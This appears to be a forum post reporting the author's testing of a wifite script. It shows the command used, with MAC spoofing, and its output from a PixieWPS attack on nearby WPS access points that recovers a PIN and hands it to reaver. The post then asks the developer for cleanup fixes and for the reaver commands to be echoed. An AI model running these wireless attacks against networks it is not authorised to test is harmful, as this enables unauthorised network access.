Code:
./wifite -mac -ponly -pto 45 -paddto 30 -showb
--- -------------------- ----------------- -- ---- ----- ---- ------
1 NE00000 00000000:DE:D7 6 WPA2 28db wps
2 TG000000 00000000:FB:00 6 WPA2 27db wps
3 DG000000 00000000:D5:F0 11 WPA2 26db wps client
[0:00:00] initializing PixieWPS attack on DG0000000 (000000000:D5:F0)
[+] E-Nonce found
[+] PKE hash found
[+] PKR hash found
[+] Authkey found
[+] E-Hash1 found
[+] E-Hash2 found
[+] Cracking using pixiewps...
[+] PIN found: 10896785
[+] Handing pin to reaver
[0:00:00] initializing WPS PIN attack on DG00000 (0000000:D5:F0)
^C0:02:59] WPS attack, 0/2 success/ttl,
(^C) WPS brute-force attack interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] quitting
Still testing, with -mac option
found:
after exiting wps pin attack from pixie attack - mon0 left alive, mac remains spoofed
Also for troubleshooting purpose's could you echo to the screen the 2nd reaver command used to find pin, and results from access point during the attack
Actually could u echo both reaver commands to screen during attack.
whole initial attack command string used by script
whole 2nd command string used to obtain pin